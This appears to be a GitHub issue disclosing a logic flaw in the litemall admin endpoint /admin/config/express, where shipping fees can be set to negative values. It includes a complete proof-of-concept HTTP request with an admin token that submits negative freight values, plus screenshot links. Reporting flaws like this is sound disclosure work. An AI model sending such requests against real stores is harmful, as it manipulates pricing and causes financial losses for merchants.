Logic Vulnerability - express fee

# Summary

A logic vulnerability exists on the endpoint /admin/config/express, where logistics costs can be set to negative values, resulting in economic losses.

# POC
```
POST /admin/config/express HTTP/1.1
Host: localhost:8080
Content-Length: 76
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/plain, */*
X-Litemall-Admin-Token: 7d001288-e95e-4927-8fe6-d527f302c9e8
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:9527
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9527/
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Cookie: JSESSIONID=7d001288-e95e-4927-8fe6-d527f302c9e8; X-Litemall-Admin-Token=7d001288-e95e-4927-8fe6-d527f302c9e8
Connection: close

{"litemall_express_freight_min":"-88","litemall_express_freight_value":"-8"}
```


<img width="1280" height="491" alt="Image" src="https://github.com/user-attachments/assets/f31aad32-9c6f-4099-b644-887e7d76a53a" />

<img width="1280" height="551" alt="Image" src="https://github.com/user-attachments/assets/d77d8f03-5fa9-4bf2-924c-546624b5bb18" />

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Logic Vulnerability - express fee #566

Summary

POC

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Logic Vulnerability - express fee #566

Description

Summary

POC

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions